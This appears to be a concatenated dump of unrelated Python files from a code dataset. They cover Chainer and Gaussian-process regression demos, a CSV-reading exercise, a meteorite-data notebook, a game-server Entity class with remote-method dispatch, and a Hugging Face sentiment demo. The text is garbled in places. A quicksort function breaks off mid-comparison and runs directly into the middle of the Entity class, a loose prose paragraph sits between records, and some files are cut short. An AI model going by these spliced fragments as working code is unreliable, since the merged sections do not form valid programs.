import datasets, iterators, optimizers, serializers\r\nfrom chainer import Link, Chain, ChainList\r\nfrom chainer.training import extensions\r\n\r\n\r\ndef create_data(n=2):\r\n\r\n X = np.random.rand(n,1).astype('float32')\r\n T = np.sum(np.hstack((X[0:-1],X[1:])),axis=1)\r\n T = np.hstack([0, T[0:]]).astype('float32')\r\n T = T.reshape([n,1])\r\n\r\n return TupleDataset(X, T)\r\n\r\ndata=create_data()\r\n\r\nclass MyRegressor(chainer.Chain):\r\n def __init__(self, predictor):\r\n super(MyRegressor, self).__init__(predictor=predictor)\r\n\r\n def __call__(self, x, y):\r\n # This chain just computes the mean absolute and squared\r\n # errors between the prediction and y.\r\n pred = self.predictor(x)\r\n abs_error = F.mean_absolute_error(pred, y)\r\n loss = F.mean_squared_error(pred, y)\r\n\r\n # Report the mean absolute and squared errors.\r\n report({'abs_error': abs_error, 'squared_error': loss}, self)\r\n\r\n return loss\r\n\r\n \r\n\r\nclass RNN(Chain):\r\n def __init__(self):\r\n super(RNN, self).__init__()\r\n with self.init_scope():\r\n self.mid = L.Linear(None, 100) # hidden fully-connected layer\r\n self.out = L.Linear(100, 1) # the feed-forward output layer\r\n\r\n\r\n def __call__(self, cur_word):\r\n # Given the pair of inputs, predict their sum.\r\n h = self.mid(cur_word)\r\n y = self.out(h)\r\n return y\r\n\r\nrnn = RNN()\r\nmodel = MyRegressor(rnn)\r\noptimizer = optimizers.SGD()\r\noptimizer.setup(model)\r\n\r\n\r\ndef compute_loss(data):\r\n # The toy dataset holds a single (x0, x1) pair and its sum as the target.\r\n inputt = data._datasets[0].reshape([1,2]).astype('float32')\r\n outputt = data._datasets[1][1].reshape([1,1]).astype('float32')\r\n return model(inputt, outputt)\r\n\r\n\r\n# \"epoch\" iteration here\r\nepochs=100\r\n\r\nfor i in range(1, epochs):\r\n \r\n data=create_data()\r\n model.cleargrads()\r\n loss = compute_loss(data)\r\n loss.backward()\r\n optimizer.update()\r\n expected=data._datasets[1][(data._datasets[1]).size-1] # takes last value of t\r\n lastinput=data._datasets[0] # takes the pair of inputs x\r\n predicted=rnn(lastinput.reshape([1,2]))\r\n error = predicted-expected # prediction error; the closer to zero, the better\r\n print (loss,error) \r\n","repo_name":"Stef0/neural-networks-class-projects","sub_path":"chainer LSTM.py","file_name":"chainer LSTM.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
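The manual cleargrads/backward/update sequence in the loop above can be collapsed: a Chainer optimizer can drive the whole step itself when handed a loss function and its arguments. A short sketch against the same model (same toy data assumed):

x = data._datasets[0].reshape([1, 2]).astype('float32')
t = data._datasets[1][1].reshape([1, 1]).astype('float32')
# optimizer.update(lossfun, *args) clears gradients, runs the forward pass,
# backpropagates, and applies the parameter update in one call
optimizer.update(model, x, t)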
LSTM.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26721213226","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel\nfrom my_gpr import gaussian_regressor\n\n\ndef target_generator(X, add_noise=False):\n target = 0.5 + np.sin(3 * X)\n if add_noise:\n rng = np.random.RandomState(1)\n target += rng.normal(0, 0.3, size=target.shape)\n return target.squeeze()\n\n\n# %%\n# Let's have a look to the target generator where we will not add any noise to\n# observe the signal that we would like to predict.\nX_real = np.linspace(0, 5, num=30).reshape(-1, 1)\ny_real = target_generator(X_real, add_noise=False)\n\nrng = np.random.RandomState(0)\nX_train = rng.uniform(0, 5, size=20).reshape(-1, 1)\ny_train = target_generator(X_train, add_noise=True)\n\nplt.plot(X_real, y_real, label=\"Expected signal\")\nplt.scatter(\n x=X_train[:, 0],\n y=y_train,\n color=\"black\",\n alpha=0.4,\n label=\"Observations\",\n)\nplt.legend()\nplt.xlabel(\"X\")\n_ = plt.ylabel(\"y\")\nplt.show()\n\nfig, axes = plt.subplots(nrows=1, ncols=1, squeeze=False)\n\nkernelParameter_sigma = 1\nkernelParameter_l = 1.e-1\nnoise_level = 1e-2\n\nmu = []\nvar = []\n\nfor i in range(2):\n ax = axes[0, 0]\n\n if i == 0:\n kernel = kernelParameter_sigma * RBF(length_scale=kernelParameter_l,\n length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(\n noise_level=noise_level, noise_level_bounds=(1e-10, 1e1)\n )\n gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)\n gpr.fit(X_train, y_train)\n y_mean, y_std = gpr.predict(X_real, return_std=True)\n\n else:\n gpr = gaussian_regressor(kernelParameter_l=kernelParameter_l,\n kernelParameter_sigma=kernelParameter_sigma,\n noise_level=noise_level)\n gpr.fit(X_train, y_train)\n y_mean, y_std = gpr.predict(X_real)\n mu.append(y_mean)\n var.append(y_std)\n\n # Plotting\n if i == 0:\n ax.plot(X_real, y_real, label=r\"$f(x) = x \\sin(x)$\", linestyle=\"dotted\")\n ax.scatter(X_train, y_train, label=\"Observations\")\n ax.plot(X_real, y_mean, label=\"Mean prediction\")\n # ax.fill_between(\n # X_real.ravel(),\n # y_mean - 1.96 * y_std,\n # y_mean + 1.96 * y_std,\n # alpha=0.5,\n # label=r\"95% confidence interval\",\n # )\n ax.legend()\n ax.set_xlabel(\"$x$\")\n ax.set_ylabel(\"$f(x)$\")\n ax.set_title(\"Gaussian process regression on noise-free dataset\")\nfig.show()\na = 0\n","repo_name":"mdallaquaXOM/HGOR","sub_path":"Learning/my_test.py","file_name":"my_test.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24084195464","text":"# Ejercicio informe.py N°2.15\n\nimport csv\n\ndef leer_camion(nombre_archivo):\n '''Lee los nombres, cantidad de cajones y precios de frutas y verduras de un archivo y guarda cada fila\n de información como una tupla dentro de una lista (camion)'''\n camion = []\n\n with open(nombre_archivo, 'rt') as archivo:\n filas = csv.reader(archivo)\n encabezado = next(filas)\n for posicion, fila in enumerate(filas):\n record = dict(zip(encabezado, fila))\n try:\n lote = (record['nombre'], int(record['cajones']), float(record['precio']))\n camion.append(lote)\n except ValueError:\n print('Faltan datos en la línea', posicion, 'del archivo.')\n return camion\n\ncamion = leer_camion('../../../Data/camion.csv')\nprint(camion)\n\nfecha_camion = 
{"seq_id":"26190946868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # ***Premise***\n# ---\n# ---\n\n# In[ ]:\n\n\n\n\n\n# # ***Questions***\n# ---\n# ---\n\n# + **Easy**\n# + Which year had the most meteors?\n# - _2013_\n# + What is the average mass of the meteors we've observed?\n# + **Hard**\n# + Are there more meteors around the equator or the poles?\n# + What time of year got the most asteroids? (Noticeable trends in year data)\n# + **Other**\n# + How many meteors fell in important years (birth year(1995), Y2K, 2008(Obama), 2020(Now))?\n# \n\n# # ***Concepts to cover***\n# ---\n# ---\n\n# - [x] Histograms\n# - [ ] PDF\n# - [ ] CDF\n# - [ ] Hypothesis Testing\n# - [ ] Confidence Interval\n# - [ ] Correlation\n# - [ ] Outliers\n# - [ ] Normal Distribution\n# - [ ] Time Analysis\n\n# # ***Imports***\n# ---\n# ---\n\n# In[11]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom scipy import stats\nimport plotly.express as px\nfrom geopy.geocoders import Nominatim\nimport geopy as gp\nfrom datetime import datetime\n\n\n# # ***Data***\n# ---\n# ---\n\n# In[17]:\n\n\ndata = pd.read_csv('data/meteorite-landings.csv')\n# data = pd.read_csv('../data/Meteorite_Landings.csv')\nprint(data.columns)\n\ndata.head()\n\n\n# ## Basic Statistics\n\n# In[18]:\n\n\nprint(\"Data described: \\n\")\nprint(data.describe())\nprint('\\n')\nprint(\"Data info: \\n\")\nprint(data.info())\n\n\n# *Conclusions / Questions*\n# - There are missing values in mass, year, and locations\n# - Appropriate data types thus far\n\n# # ***Cleaning***\n# ---\n# ---\n# \n\n# ## Rename columns\n\n# In[19]:\n\n\ndata.rename(columns={'recclass':'class', 'reclat':'lat', 'reclong':'long', 'mass (g)':'mass'}, inplace=True)\ndata\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Outliers\n\n# In[20]:\n\n\nsns.boxplot(x=data['year'])\n\n\n# In[21]:\n\n\nfig, ax = plt.subplots(figsize=(16,8))\nax.scatter(data['year'], data['mass'])\nplt.show()\n\n\n# # ***Statistical Plotting***\n# ---\n# ---\n\n# ## Fall vs Fallen Histogram\n\n# In[22]:\n\n\ndata['fall'].hist(bins=3)\nplt.show()\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Equator or Poles\n\n# In[23]:\n\n\nplt.scatter(data.mass, data.lat)\n# print(data[data['lat']>0].count())\n# print(data[data['lat']<0].count())\naxes = plt.gca()\naxes.set_ylim([-90,90])\nabove_equator = data[data.lat >0].shape[0]\nat_equator = data[data.lat ==0].shape[0]\nbelow_equator = data[data.lat <0].shape[0]\nplt.show()\n\nprint(\"Above Equator:\", above_equator, '\\n')\nprint(\"At Equator:\", at_equator, '\\n')\nprint(\"Below Equator:\", below_equator, '\\n')\n\nlabels = [\"Above\", 'At', 'Below']\nvalues = [above_equator, at_equator, below_equator]\nplt.pie(values, labels=labels)\nplt.show()\n\n\n# *Conclusions / Questions*\n# - There are missing values because of the `NaN` values that I didn't remove. If I do remove them and replace them with 0, then it'll alter results of values that actually are on the equator or prime meridian
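Since the missing-coordinate concern above is exactly what dropna is for, here is a small sketch (same dataframe assumed) that counts hemispheres only over rows with a known latitude, so genuine zeros on the equator are not conflated with missing values:

known = data.dropna(subset=['lat'])
above_equator = (known.lat > 0).sum()
at_equator = (known.lat == 0).sum()
below_equator = (known.lat < 0).sum()
missing = len(data) - len(known)  # rows with no recorded latitude, reported separately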
\n\n# ## Box Plot\n\n# *Conclusions / Questions*\n# - ...\n\n# ## PDF\n\n# In[10]:\n\n\nsns.distplot(data['year'].dropna(), hist=True, kde=True, bins=16)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## CDF\n\n# In[24]:\n\n\nls_year = data['year'].dropna().values\n\ndef calculate_cdf(x, threshold):\n return np.sum(x <= threshold)\n\n# Create an array cdf_year where each value is the cdf of the year for each threshold\ncdf_year = [calculate_cdf(ls_year, r)/len(ls_year) for r in range(int(np.min(ls_year)), int(np.max(ls_year)))]\n\nplt.plot(range(int(np.min(ls_year)), int(np.max(ls_year))), cdf_year)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Violin Plot\n\n# In[12]:\n\n\nsns.violinplot(x=\"year\", y=\"mass\", data=data)\n\n\n# *Conclusions / Questions*\n# - Why are the masses in the violin plot negative?\n\n# ## Correlation\n\n# In[13]:\n\n\nsns.heatmap(data.corr(), annot=True, cmap='coolwarm')\n\n\n# *Conclusions / Questions*\n# - ...\n\n# # ***Various Plotting***\n# ---\n# ---\n\n# ## See the top 10 classification of meteors\n\n# In[14]:\n\n\ntop_10_class = data['class'].value_counts()[:10]\n\ntop_10_class.plot(kind='bar')\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Lat and Long scatter plot, using mass as bubble size\n# - ***Latitude are y values (90 through -90)***\n# - ***Longitude are x values (-180 to 180)***\n\n# In[25]:\n\n\nplt.figure(figsize=(10,7))\nN = len(data['mass'])\narea = (30 * np.random.rand(N))**2 # 0 to 15 point radii\ncolors = np.random.rand(N)\nplt.scatter(data['long'], data['lat'], s=area, c=colors, alpha=0.2)\n\nplt.grid(True)\naxes = plt.gca()\naxes.set_xlim([-180,180])\naxes.set_ylim([-90,90])\nplt.show()\n\n\n# *Conclusions / Questions*\n# - ...\n\n# ## Geolocation Function using geopy\n# \n\n# In[ ]:\n\n\n# geolocator = Nominatim(user_agent=\"project_impact\")\n# coor=gp.Point(data['lat'][1], data['long'][1])\n# location = geolocator.reverse(coor)\n# print(location.raw['address'].get('country'))\n\n\n# ## Geolocations loop\n\n# In[ ]:\n\n\n# lists = []\n# for i in range(20):\n# lats = data['lat'].get(key = i)\n# longs = data['long'].get(key = i)\n# coor = gp.Point(lats, longs)\n# country = geolocator.reverse(gp.Point(coor)).raw['address'].get('country')\n# lists.append(country)\n# print(lists)\n\n\n# ## Year Value Counts\n\n# In[16]:\n\n\nprint(data['year'].value_counts())\n# data['class'].value_counts().plot(kind='bar') # bar chart of the number of meteors by class\n\n\n# ## Time Analysis\n\n# In[17]:\n\n\ndata['year'].fillna(0).astype(int)\n\n\n# *Conclusions / Questions*\n# - ...\n\n# In[18]:\n\n\nyear_count = data.groupby('year')['year'].count()\nplt.figure(figsize=(10,8))\nplt.plot(year_count)\nprint(\"Yearly counts described: \", year_count.describe(), '\\n')\nprint(\"Confirming number of unique years:\", data.year.nunique(), '\\n')\nprint(\"Most recent year in data:\", data.year.max())\nprint(\"Total span of year data: \", data.year.max()-data.year.min(), 'years\\n')\n# plt.hist(year_count)\n\n\n# *Conclusions / Questions*\n# - ...\n","repo_name":"RobotGyal/Project-Impact-v1","sub_path":"data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"41197749437","text":"def 
partition(array,l,u):\n pivot = array[l]\n j=l\n for i in range(l+1,u+1):\n if array[i]\"\n return f\"\"\n\n def __init_subclass__(cls, **kwargs):\n cls.register_typename(cls.context_name, cls.__name__, cls)\n # s= os.path.abspath(sys.modules[cls.__module__].__file__)\n # if Globals.IsInGenerator:\n if getattr(cls, 'entity_type', None) != 'service':\n if cls.context_name.lower() != \"unknown\":\n cls.__modulepath__ = str(Path(os.getcwd()).parent.joinpath(\"Entities\").joinpath(cls.context_name).joinpath(cls.__name__ + \".py\"))\n\n\n cls.register_all_methods()\n cls.register_all_properties()\n # SymbolsRegistry().register_entity_type(cls)\n\n async def __ainit__(self, *args, **kwargs):\n await AsyncObj.__ainit__(self)\n self.pending_destroy = False\n self.timer_to_destroy = None\n self.subscribed_clients = list()\n self.subscribed_entities = set()\n self.properties_values = dict()\n self.internal_id = UNDEFINED_ID\n self.client = InvalidMailbox()\n self.timers: List[asyncio.TimerHandle] = list()\n if self.is_multicast:\n self.all_clients = MulticastMailbox(\"ue4\", self.__class__.__name__, remote_id=-1)\n self.all_clients_apps = MulticastMailbox(\"ue4\", \"UE4App\", remote_id=0)\n else:\n self.all_clients = InvalidMailbox()\n self.all_clients_apps = InvalidMailbox()\n EntitiesDispatcher().register_new(self)\n\n for prop_name, prop_meta in self.properties.items():\n if not issubclass(prop_meta.prop_type, Entity):\n default_value = prop_meta.prop_type.instantiate()\n setattr(self, prop_name, default_value)\n\n def get_client_interface(self):\n return self.all_clients if self.is_multicast else self.client\n\n async def __apostinit__(self):\n # await self.init_done()\n await self.begin_play()\n\n # async def init_done(self):\n # await self.begin_play()\n\n async def begin_play(self):\n pass\n\n def end_play(self):\n pass\n\n def destroy(self):\n if not self.pending_destroy:\n from traceback import print_stack\n #print_stack()\n INFO_MSG(f\"Entity {self.internal_id} pending destroy\")\n self.end_play()\n\n for client in self.subscribed_clients:\n if client:\n client.DestroyClientEntity(self.internal_id)\n\n EntitiesDispatcher().destroy_entity(self)\n\n self.pending_destroy = True\n\n for prop_name in self.properties.keys():\n delattr(self, prop_name)\n self.properties_values = dict()\n self.properties_locks = dict()\n\n [timer.cancel() for timer in self.timers]\n self.timers.clear()\n\n def call_later(self, func, secs):\n timer = call_later(func, secs)\n self.timers.append(timer)\n return timer\n\n def set_internal_id(self, internal_id):\n self.internal_id = internal_id\n if self.is_multicast:\n self.update_multicast_mailbox()\n\n def update_multicast_mailbox(self):\n self.all_clients.set_id(self.internal_id)\n\n def __isvalid__(self):\n return super().__isvalid__() and \\\n self.internal_id != UNDEFINED_ID\n\n T = TypeVar('T')\n @classmethod\n async def make_mailbox(cls: Type[T], context_name, entity_typename, endpoint_or_connection, *, remote_id=0) -> Union[T, Mailbox]:\n mailbox = await Mailbox(context_name, entity_typename, endpoint_or_connection, remote_id)\n return mailbox\n\n @classmethod\n async def mailbox_cast(cls, other_mailbox: Mailbox):\n mailbox = await Mailbox(other_mailbox.context_name,\n other_mailbox.entity_typename,\n None,\n other_mailbox.remote_id,\n (other_mailbox.client_connection, other_mailbox.endpoint))\n return mailbox\n\n\n @classmethod\n def register_rmi_method(cls, method):\n if not method.__name__ in cls.rmi_mapping:\n id = len(cls.rmi_methods)\n 
cls.rmi_methods[id] = method\n cls.rmi_mapping[method.__name__] = id\n return id\n\n @classmethod\n def register_all_methods(cls):\n cls.rmi_methods = dict(cls.rmi_methods)\n cls.rmi_mapping = dict(cls.rmi_mapping)\n methods_to_register = getattr(cls, 'methods_to_register', list())\n for method in methods_to_register:\n cls.register_rmi_method(method)\n\n @classmethod\n def get_annotations(cls):\n res = dict()\n for base in (cls.__bases__ + (cls,)):\n if hasattr(base, '__annotations__'):\n res.update(base.__annotations__)\n return res\n\n @classmethod\n def serializable_value(cls, *value):\n return 0\n\n @classmethod\n def register_property(cls, name, T, default):\n if isinstance(T, type) and issubclass(T, TypeBase):\n T = PropertyMetadata(T)\n if isinstance(T, PropertyMetadata):\n\n data = get_annotation_comment_and_line_by_source(cls, name, cls.__modulepath__)\n if data:\n comment, lnum = data\n T.set_comment(comment)\n T.set_line_number(lnum)\n T.set_source(cls.__modulepath__)\n\n if default is not None:\n T.set_has_default()\n\n if default is not None:\n T.set_default(T.prop_type.serializable_value(default))\n else:\n if issubclass(T.prop_type, Entity):\n T.set_default(None)\n else:\n T.set_default(T.prop_type.serializable_value())\n cls.properties[name] = T\n\n cls.create_property(name)\n\n @classmethod\n def register_all_properties(cls):\n cls.properties: Dict[str, PropertyMetadata] = dict(cls.properties)\n for key, value in cls.get_annotations().items():\n if isinstance(value, TypeBase) or isinstance(value, PropertyMetadata):\n default_value = getattr(cls, key, None)\n cls.register_property(key, value, default_value)\n if isinstance(value, int):\n value = [value]\n\n if isinstance(value, list):\n if DisplayThis in value:\n cls.display_attributes += key,\n\n @classmethod\n def create_property(cls, property_name):\n def setter(self, in_value):\n old = self.get_property_value(property_name)\n if old.is_transactional and not old.locked:\n raise ValueError(\"Only in transactions 'Transactional' properties can be changed\")\n T = old.__class__\n from Core.LocalDatatypes import int32\n if property_name == \"CityInstance\" and issubclass(T, int32):\n ERROR_MSG(\"OMG!\")\n db_interface = old.db_interface\n client_interface = old.client_interface\n try:\n in_value = T.instantiate(in_value)\n except TypeError:\n print('...')\n in_value.set_db_interface(db_interface)\n in_value.set_client_interface(client_interface)\n in_value.initialize_property(self, property_name)\n in_value._locked = old.locked\n if old.is_transactional:\n in_value.locker = old.locker\n self.set_property_value(property_name, in_value)\n if not in_value.locked:\n in_value.replicate()\n\n def getter(self):\n return self.get_property_value(property_name)\n\n def deleter(self):\n self.destroy_property()\n\n setattr(cls, property_name, property(getter, setter, deleter))\n\n def set_property_value(self, key, value):\n self.properties_values[key] = value\n\n def get_property_value(self, key):\n return self.properties_values.get(key, self.properties[key].default)\n\n @classmethod\n def get_method_by_id(cls, id):\n method = cls.rmi_methods.get(id, None)\n assert method is not None or error(\"Failed to get method by id %i\" % id)\n return method\n\n @classmethod\n def get_method_id(cls, method):\n for key, value in cls.rmi_methods:\n if value == method:\n return key\n else:\n return None\n\n async def execute_rmi(self, executor_connection, method_index, future_id, access_token, params_data):\n method = 
self.get_method_by_id(method_index)\n\n CALL_INFO_MSG(\"Call method %s\" % method)\n params, returns, defaults = method.rmi_signature\n\n serialized_params = BinarySerialization(params_data)\n args = list()\n data = serialized_params.get_data()\n\n if len(params) != len(data):\n raise SerializationError(f\"Signature mismatch: formal parameters count are not equals to serialized {method}, {executor_connection.endpoint}\")\n\n for param_index, (param_name, param_type) in enumerate(params):\n arg = param_type.deserialize(serialized_params.get_data()[param_index])\n if isinstance(arg, AsyncObj):\n arg = await arg\n args.append(arg)\n\n if CaptureConnection in method.rmi_specifiers['specifiers']:\n args = [executor_connection] + args\n\n if CaptureAccessToken in method.rmi_specifiers['specifiers']:\n args = [access_token] + args\n\n\n access_level = method.rmi_specifiers['kwspecifiers'].get('access', AccessLevel.Internal)\n if not Access().has_access(access_token, access_level):\n err = \"call to %s. Access denied!\" % method\n ERROR_MSG(err)\n self.send_error(executor_connection, err, future_id)\n return\n\n if hasattr(self, \"__rmi_firewall__\"):\n error_message = self.__rmi_firewall__(method)\n if error_message:\n err = \"call to forbidden method %s, reason:\" % (method, error_message)\n ERROR_MSG(err)\n self.send_error(executor_connection, err, future_id)\n return\n\n\n if not method.rmi_specifiers['isasyncmethod']:\n method(self, *args) # Call the method\n else:\n try:\n ret_data = await method(self, *args) # Call the async method\n except Exception as e:\n print('lolz', method, args)\n raise\n\n if not isinstance(ret_data, tuple):\n ret_data = ret_data,\n\n if len(returns) > 0:\n assert len(ret_data) == len(returns) or error(f\"Actual return values for method {method.__name__} count must be equals with formal return values count! 
{len(ret_data)}/{len(returns)}\", do_break=True)\n\n serialized_returns = BinarySerialization()\n for ret_index, ret_type in enumerate(returns):\n if issubclass(ret_type, MailboxProxyDatatype):\n if not ret_data[ret_index].is_exposed_mailbox and Exposed in method.rmi_specifiers['specifiers']:\n ret = ret_type.instantiate(ret_data[ret_index]).as_exposed()\n else:\n ret = ret_type.instantiate(ret_data[ret_index])\n else:\n ret = ret_type.instantiate(ret_data[ret_index])\n serialized_returns << ret.serialize()\n\n\n serialized_yield = BinarySerialization()\n serialized_yield << self.internal_id\n serialized_yield << method_index\n serialized_yield << future_id\n serialized_yield << serialized_returns\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_future\n message << serialized_yield.get_archive()\n\n\n CALL_INFO_MSG(f\"Send response for method {method} {message.get_archive()}\")\n executor_connection.send(message.get_archive())\n\n\n def send_error(self, executor_connection, err, future_id):\n msg_data = BinarySerialization()\n msg_data << \"%s[%i]:%s:%s\" % (Globals.this_service.__class__.__name__,\n self.internal_id,\n Globals.this_service.endpoint[0],\n Globals.this_service.endpoint[1])\n msg_data << err\n msg_data << future_id\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_error\n message << msg_data\n\n executor_connection.send(message.get_archive())\n\n def send_exception(self, executor_connection, exc, future_id):\n assert isinstance(exc, Exception)\n\n msg_data = BinarySerialization()\n msg_data << \"%s[%i]:%s:%s\" % (Globals.this_service.__class__.__name__,\n self.internal_id,\n Globals.this_service.endpoint[0],\n Globals.this_service.endpoint[1])\n msg_data << exc.__class__.__name__\n msg_data << ', '.join(exc.args)\n msg_data << future_id\n\n message = BinarySerialization()\n message << ConnectionMessageTypes.rmi_exception\n message << msg_data\n\n executor_connection.send(message.get_archive())\n\n\n def get_id(self):\n return self.internal_id\n\n def get_class_name(self):\n return self.__class__.__name__\n\n def get_endpoint(self):\n return self.service.endpoint\n\n def get_context(self):\n return Globals.context_name\n\n async def client_connected(self, client):\n client_mailbox = client if not self.is_multicast else self.all_clients_apps\n\n for name, prop_info in self.properties.items():\n var = getattr(self, name)\n if Replicated in prop_info.specifiers:\n var.initialize_property(self, name)\n var.set_client_interface(ClientVariableProxy(client_mailbox, self.internal_id, name, PartialRep_EXPERIMENTAL in prop_info.specifiers))\n\n var.replicate()\n\n if not self.is_multicast:\n self.client = await self.make_mailbox(\"ue4\", self.__class__.__name__, client.client_connection, remote_id=self.internal_id )\n\n await self.on_client_connected()\n\n\n async def on_client_connected(self):\n pass\n\n def get_subscriber(self, access_token):\n for subscribed_entity in self.subscribed_entities:\n if getattr(subscribed_entity, \"access_token\", None) == access_token:\n return subscribed_entity\n\n def on_lost_subscriber(self, subscriber):\n subscriber_client = subscriber\n if isinstance(subscriber, Entity):\n subscriber_client = subscriber.ue4client\n if subscriber in self.subscribed_entities:\n self.subscribed_entities.remove(subscriber)\n if subscriber_client in self.subscribed_clients:\n self.subscribed_clients.remove(subscriber_client)\n\n async def subscribe(self, entity_or_client):\n client: Mailbox = entity_or_client\n if 
isinstance(entity_or_client, Entity):\n client = entity_or_client.ue4client # todo: review it\n self.subscribed_entities.add(entity_or_client)\n\n client << partial(self.on_lost_subscriber, entity_or_client)\n\n if client in self.subscribed_clients and self.is_multicast:\n return WARN_MSG(f\"{client} already subscribed to {self}\")\n\n if len(self.subscribed_clients) > 1 and not self.is_multicast:\n self.subscribed_clients.clear()\n # return WARN_MSG(f\"Cannot subscribe {client} to {self}. Already has connection\")\n\n self.subscribed_clients.append(client)\n if self.is_multicast:\n await self.all_clients.subscribe_connection(client)\n await self.all_clients_apps.subscribe_connection(client)\n await client.CreateClientEntity(self.__class__.__name__, self.internal_id)\n await self.client_connected(client)\n INFO_MSG(f\"Client {client} subscribed to {self}\")\n\n def unsubscribe(self, entity_or_client):\n client: Mailbox = entity_or_client\n if isinstance(entity_or_client, Entity):\n client = entity_or_client.ue4client # todo: review it\n if entity_or_client in self.subscribed_entities:\n self.subscribed_entities.remove(entity_or_client)\n\n if client in self.subscribed_clients:\n self.subscribed_clients.remove(client)\n if self.is_multicast:\n self.all_clients.unsubscribe_connection(client)\n self.all_clients_apps.unsubscribe_connection(client)\n\n client.DestroyClientEntity(self.internal_id)\n\n\n def rep_all_from(self, other_entity: 'Entity'):\n for prop_name, prop_meta in other_entity.properties.items():\n if Replicated in prop_meta:\n var = getattr(other_entity, prop_name)\n var.rep_to(self)\n\n def get_properties(self, *specifiers):\n out_properties = dict()\n for prop_name, prop_info in self.properties.items():\n if set(specifiers) <= set(prop_info.specifiers):\n out_properties[prop_name] = prop_info\n return out_properties\n\n def set_lifespan(self, time_to_destroy):\n self.reanimate()\n self.timer_to_destroy = call_later(self.destroy, time_to_destroy)\n\n def reanimate(self):\n if self.timer_to_destroy:\n self.timer_to_destroy.cancel()\n\nEntity.register_all_methods()\n\n","repo_name":"broly/HaloNet","sub_path":"HaloNet/System/Core/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":19903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1628589194","text":"base = 1.0\r\nfactor = 0.01\r\na = pow(base+factor,365)\r\nb = 1.0\r\nwhile b < a:\r\n b=1.0\r\n for i in range(365):\r\n if i % 7 in [6,0]:\r\n b=b*(base-0.01)\r\n else:\r\n b=b*(base+factor)\r\n factor = factor + 0.001\r\nprint(\"工作日的努力参数是: {:.3f}\".format(factor-0.001))\r\n","repo_name":"xianfanwindy/python123","sub_path":"w3e3.py","file_name":"w3e3.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17564515029","text":"from transformers import Trainer, TrainingArguments\n\nfrom transformers import pipeline\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom getsampletxt import get_sample_txt\nimport torch\nimport torch.nn.functional as F\n\n\ntxt = get_sample_txt(True)\n\n# print(txt)\n# classifier = pipeline(\"sentiment-analysis\")\n\nmodel_name = \"distilbert-base-uncased-finetuned-sst-2-english\"\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\ndemo_num = 5\nif demo_num == 1:\n classifier = pipeline(\"sentiment-analysis\", model = 
model, tokenizer = tokenizer)\n res = classifier(txt)\n print(res)\nif demo_num == 2:\n txt = \"hi. How are you. I like machine learning\"\n res = tokenizer(txt)\n print(\"tokenizer output\", res)\n tokens = tokenizer.tokenize(txt)\n print(\"tokens\", tokens)\n ids = tokenizer.convert_tokens_to_ids(tokens)\n print(\"ids\", ids)\n decoded_string = tokenizer.decode(ids)\n print(\"decoded string:\", decoded_string)\nif demo_num == 3:\n print(\" Using PyTorch \")\n X_train = txt\n batch = tokenizer(X_train, padding = True, truncation = True, max_length = 512, return_tensors = \"pt\")\n print('batch', batch)\n with torch.no_grad():\n outputs = model(**batch)\n print('outputs', outputs)\n predictions = F.softmax(outputs.logits, dim = 1)\n print('predictions', predictions)\n labels = torch.argmax(predictions, dim = 1)\n print(labels)\nif demo_num == 4:\n # saving and loading a model\n save_dir = \"save\"\n tokenizer.save_pretrained(save_dir)\n model.save_pretrained(save_dir)\n\n # then load\n tok = AutoTokenizer.from_pretrained(save_dir)\n mod = AutoModelForSequenceClassification.from_pretrained(save_dir)\n\nif demo_num == 5:\n # 1. prep dataset\n # 2. load pretrained Tokenizer, call it with dataset -> encoding\n # 3. build PyTorch Dataset with encodings\n # 4. load pretrained model\n # 5. a) load Trainer and train it\n # OR\n # 5. b) native PyTorch training loop\n training_args = TrainingArguments(\"test-trainer\")\n # trainer = Trainer(\n # model,\n # training_args, \n # train_dataset= ..., \n # eval_dataset=,\n # data_collator=,\n # tokenizer = tokenizer\n # )\n\n # trainer.train()\n","repo_name":"garland3/hf_tests","sub_path":"classifier_with_tokens.py","file_name":"classifier_with_tokens.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
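The commented-out skeleton in demo 5 only needs datasets to run; a hedged sketch of the filled-in call, where train_ds and eval_ds are hypothetical torch Dataset objects of tokenized examples (they are not defined in the original script):

trainer = Trainer(
    model,
    training_args,
    train_dataset=train_ds,   # placeholder: tokenized training examples
    eval_dataset=eval_ds,     # placeholder: tokenized eval examples
    tokenizer=tokenizer,
)
trainer.train()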
